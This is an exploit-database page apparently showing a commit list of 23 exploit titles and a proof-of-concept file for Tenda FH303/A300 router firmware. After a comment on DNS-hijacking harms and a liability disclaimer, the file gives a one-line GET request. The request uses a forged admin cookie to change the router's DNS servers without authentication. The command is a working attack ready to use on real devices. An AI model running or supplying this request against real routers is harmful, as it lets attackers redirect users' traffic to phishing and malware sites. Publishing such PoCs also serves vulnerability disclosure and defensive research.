a13c4ea572
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
62 lines
No EOL
2.3 KiB
Text
62 lines
No EOL
2.3 KiB
Text
#
|
|
#
|
|
# Tenda FH303/A300 Firmware V5.07.68_EN
|
|
# Cookie Session Weakness Remote DNS Change PoC
|
|
#
|
|
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
|
|
# https://ethical-hacker.org/
|
|
# https://facebook.com/ethicalhackerorg
|
|
#
|
|
#
|
|
# Once modified, systems use foreign DNS servers, which are
|
|
# usually set up by cybercriminals. Users with vulnerable
|
|
# systems or devices who try to access certain sites are
|
|
# instead redirected to possibly malicious sites.
|
|
#
|
|
# Modifying systems' DNS settings allows cybercriminals to
|
|
# perform malicious activities like:
|
|
#
|
|
# o Steering unknowing users to bad sites:
|
|
# These sites can be phishing pages that
|
|
# spoof well-known sites in order to
|
|
# trick users into handing out sensitive
|
|
# information.
|
|
#
|
|
# o Replacing ads on legitimate sites:
|
|
# Visiting certain sites can serve users
|
|
# with infected systems a different set
|
|
# of ads from those whose systems are
|
|
# not infected.
|
|
#
|
|
# o Controlling and redirecting network traffic:
|
|
# Users of infected systems may not be granted
|
|
# access to download important OS and software
|
|
# updates from vendors like Microsoft and from
|
|
# their respective security vendors.
|
|
#
|
|
# o Pushing additional malware:
|
|
# Infected systems are more prone to other
|
|
# malware infections (e.g., FAKEAV infection).
|
|
#
|
|
# Disclaimer:
|
|
# This or previous programs is for Educational
|
|
# purpose ONLY. Do not use it without permission.
|
|
# The usual disclaimer applies, especially the
|
|
# fact that Todor Donev is not liable for any
|
|
# damages caused by direct or indirect use of the
|
|
# information or functionality provided by these
|
|
# programs. The author or any Internet provider
|
|
# bears NO responsibility for content or misuse
|
|
# of these programs or any derivatives thereof.
|
|
# By using these programs you accept the fact
|
|
# that any damage (dataloss, system crash,
|
|
# system compromise, etc.) caused by the use
|
|
# of these programs is not Todor Donev's
|
|
# responsibility.
|
|
#
|
|
# Use them at your own risk!
|
|
#
|
|
#
|
|
|
|
|
|
GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null |